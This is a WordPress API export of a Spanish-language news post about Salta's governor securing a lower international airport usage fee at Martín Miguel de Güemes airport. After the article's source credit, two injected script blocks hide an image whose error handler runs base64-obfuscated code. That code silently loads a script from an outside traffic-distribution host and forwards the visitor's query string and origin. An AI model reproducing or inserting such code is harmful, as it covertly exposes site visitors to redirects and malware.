{"id":3318,"date":"2023-11-17T20:37:33","date_gmt":"2023-11-17T23:37:33","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3318"},"modified":"2025-08-14T00:05:02","modified_gmt":"2025-08-14T03:05:02","slug":"el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3318","title":{"rendered":"El gobernador S\u00e1enz gestion\u00f3 la reducci\u00f3n de la Tasa de Uso para vuelos internacionales que arriben a la provincia"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Desde el 1 de enero de 2024 la Tasa Aeroportuaria del Aeropuerto Internacional Mart\u00edn Miguel de G\u00fcemes pasar\u00e1 de costar U$D57 a U$D15 por pasajero. Permitir\u00e1 seguir generando condiciones de competitividad y progreso.<\/em><\/h5>\n\n\n\n<p>El gobernador&nbsp;<strong>Gustavo<\/strong>&nbsp;<strong>S\u00e1enz<\/strong>&nbsp;gestion\u00f3 ante el ministro de Econom\u00eda de la Naci\u00f3n, Sergio Massa, la baja en la \u201cTasa de Uso de Aeroestaci\u00f3n Internacional\u201d para el Aeropuerto Internacional \u201cMart\u00edn Miguel de G\u00fcemes\u201d.<\/p>\n\n\n\n<p>La medida surge de la necesidad de continuar creando condiciones de competitividad y desarrollo para el turismo. La Provincia es considerada por la industria nacional e internacional como un HUB de distribuci\u00f3n aeroportuaria en el Norte argentino, se destaca as\u00ed por su ubicaci\u00f3n geogr\u00e1fica estrat\u00e9gica al ser el \u00fanico distrito provincial que limita con tres pa\u00edses.<\/p>\n\n\n\n<p>La TUA es abonada por las personas pasajeras al momento de adquisici\u00f3n del ticket a\u00e9reo para los vuelos comerciales regulares. Su valor es diferente seg\u00fan el tipo de vuelo (nacional, regional o internacional) y el aeropuerto de origen del viaje, siendo competencia del Organismo Regulador del Sistema Nacional de Aeropuertos (Orsna)<\/p>\n\n\n\n<p>Esta gesti\u00f3n lograda por el mandatario provincial con el apoyo del Ministro de Econom\u00eda de la Naci\u00f3n permitir\u00e1 reducir la tasa aeroportuaria de U$57 a U$15 a partir del 1\u00b0 de enero de 2024.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/92979-el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia.jpg\" alt=\"\" class=\"wp-image-3319\" width=\"344\" height=\"264\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/92979-el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/92979-el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia-300x230.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/92979-el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia-548x420.jpg 548w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/92979-el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia-80x60.jpg 80w\" sizes=\"(max-width: 344px) 100vw, 344px\" \/><\/figure><\/div>\n\n\n<p>La obtenci\u00f3n de una tasa diferencial genera oportunidades considerables tanto para los operadores como para todos los actores econ\u00f3micos locales que reciben los beneficios directos e indirectos que el transporte a\u00e9reo genera. Por mencionar algunos puntos positivos importantes se pueden enumerar el impacto econ\u00f3mico, la mayor demanda de servicios, las vinculaciones comerciales para productores y empresarios locales y un aumento en el ingreso de divisas extranjeras.<\/p>\n\n\n\n<p>\u201cHace un a\u00f1o y medio ven\u00edamos en un trabajo conjunto con otras provincias sobre la posibilidad de la reducci\u00f3n de la tasa aeroportuaria, que en nuestro caso, por nuestra ubicaci\u00f3n geogr\u00e1fica y al limitar con tres pa\u00edses, va a consolidar a Salta como un hub de referencia regional, colaborando con el crecimiento del turismo receptivo internacional, generando m\u00e1s divisas para los argentinos\u201d, afirm\u00f3 el gobernador Gustavo S\u00e1enz.<\/p>\n\n\n\n<p>Por otro lado, la reducci\u00f3n de la tasa representa una importante visi\u00f3n en t\u00e9rminos de adecuar el mercado argentino con Bolivia, Chile y Paraguay. En un contexto econ\u00f3mico de importantes niveles de competitividad resulta central adecuar los diferentes marcos regulatorios para viabilizar el crecimiento de las diferentes actividades econ\u00f3micas.<\/p>\n\n\n\n<p>En el aeropuerto internacional Mart\u00edn Miguel de G\u00fcemes se pusieron en marcha las obras de ampliaci\u00f3n que incrementar\u00e1 en un 65% la superficie de la estaci\u00f3n a\u00e9rea y duplicar\u00e1 la capacidad de pasajeros en el aeropuerto, en l\u00ednea con el crecimiento de la actividad tur\u00edstica proyectada en la provincia.<\/p>\n\n\n\n<p>Actualmente, Salta es la principal v\u00eda de acceso a\u00e9rea a la Argentina desde el Norte del pa\u00eds, con conexi\u00f3n a 9 destinos(todas las regiones del pa\u00eds) a la que se suma el vuelo directo con San Pablo y el que iniciar\u00e1 operaciones desde Lima a partir de diciembre.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-gobernador-saenz-gestiono-la-reduccion-de-la-tasa-de-uso-para-vuelos-internacionales-que-arriben-a-la-provincia-92979\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde el 1 de enero de 2024 la Tasa Aeroportuaria del Aeropuerto Internacional Mart\u00edn Miguel de G\u00fcemes pasar\u00e1 de costar U$D57 a U$D15 por pasajero. Permitir\u00e1 seguir generando condiciones de competitividad y progreso. El gobernador&nbsp;Gustavo&nbsp;S\u00e1enz&nbsp;gestion\u00f3 ante el ministro de Econom\u00eda de la Naci\u00f3n, Sergio Massa, la baja en la \u201cTasa de Uso de Aeroestaci\u00f3n Internacional\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3320,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5,11],"tags":[],"class_list":{"0":"post-3318","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3318"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3318"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3318\/revisions"}],"predecessor-version":[{"id":6915,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3318\/revisions\/6915"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3320"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}